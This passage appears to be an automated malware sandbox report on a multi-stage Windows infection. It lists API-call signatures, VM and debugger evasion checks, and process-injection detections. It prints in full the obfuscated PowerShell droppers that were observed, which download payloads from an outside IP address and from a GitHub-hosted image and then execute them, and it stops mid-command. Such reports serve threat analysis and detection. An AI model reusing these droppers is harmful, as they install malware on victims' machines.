                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_0040928E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,11_2_0041C322
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,11_2_0040C388
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_004096A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,11_2_00408847
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00407877 FindFirstFileW,FindNextFileW,11_2_00407877
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044E8F9 FindFirstFileExA,11_2_0044E8F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,11_2_0040BB6B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,11_2_00419B86
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,11_2_0040BD72
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_100010F1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_10006580 FindFirstFileExA,11_2_10006580
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040AE51 FindFirstFileW,FindNextFileW,12_2_0040AE51
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,11_2_00407CD2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00418981 memset,GetSystemInfo,12_2_00418981
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: wscript.exe, 00000006.00000003.2117628657.0000000004FF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2118544758.0000000004FF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2119011469.0000000004FF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2125123731.0000000004FF3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2119474519.0000000004FF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2119592378.0000000004FF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2119244676.0000000004FF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2119359144.0000000004FF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2118841125.0000000004FF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2119700909.0000000004FF2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: maBsUhaSJBQemUf1g
                      Source: wscript.exe, 00000006.00000003.2118334105.0000000004FC6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2119011469.0000000004FC6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2117843347.0000000004FC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: maBsUhaSJBQemUf@I[
                      Source: powershell.exe, 00000003.00000002.2060949985.00000000047D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                      Source: powershell.exe, 00000003.00000002.2060949985.00000000047D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                      Source: wscript.exe, 00000006.00000003.2121625089.0000000000CCD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\$
                      Source: powershell.exe, 00000001.00000002.2137672850.0000000007AE0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2140866508.0000000008A01000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4471996980.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4473682945.0000000001455000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: wscript.exe, 00000006.00000003.2121451879.0000000000C61000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2117628657.0000000004FF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2118544758.0000000004FF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2119011469.0000000004FF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2125123731.0000000004FF3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2119474519.0000000004FF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2119592378.0000000004FF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2123014058.0000000005071000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2119244676.0000000004FF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2119359144.0000000004FF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2118841125.0000000004FF2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: maBsUhaSJBQemUf = "KkihOcWzULKLWxx"
                      Source: powershell.exe, 00000001.00000002.2140866508.0000000008A0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\U
                      Source: powershell.exe, 00000003.00000002.2060949985.00000000047D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                      Source: wscript.exe, 00000006.00000003.2121625089.0000000000CCD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}v
                      Source: powershell.exe, 00000009.00000002.2234270142.000000000277C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_11-55446
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00434A8A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,12_2_0040DD85
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,11_2_0041CBE1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00443355 mov eax, dword ptr fs:[00000030h]11_2_00443355
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_10004AB4 mov eax, dword ptr fs:[00000030h]11_2_10004AB4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00411D39 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,11_2_00411D39
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_0043503C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00434A8A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0043BB71
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00434BD8 SetUnhandledExceptionFilter,11_2_00434BD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_100060E2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_10002639
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_10002B1C

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Yara detected Powershell decode and execute
                      Source: Yara matchFile source: amsi32_3812.amsi.csv, type: OTHER
                      Yara detected Powershell download and execute
                      Source: Yara matchFile source: amsi32_4720.amsi.csv, type: OTHER
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4720, type: MEMORYSTR
                      Bypasses PowerShell execution policy
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                      Contains functionality to inject code into remote processes
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,11_2_0041812A
                      Injects a PE file into a foreign processes
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                      Maps a DLL or memory area into another process
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                      Writes to foreign memory regions
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F91008Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe11_2_00412132
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00419662 mouse_event,11_2_00419662
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXeJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.cmdline"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC057.tmp" "c:\Users\user\AppData\Local\Temp\p44lx5ym\CSC1BDFD807A6FD4EDC87F258A79D1E57AA.TMP"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt 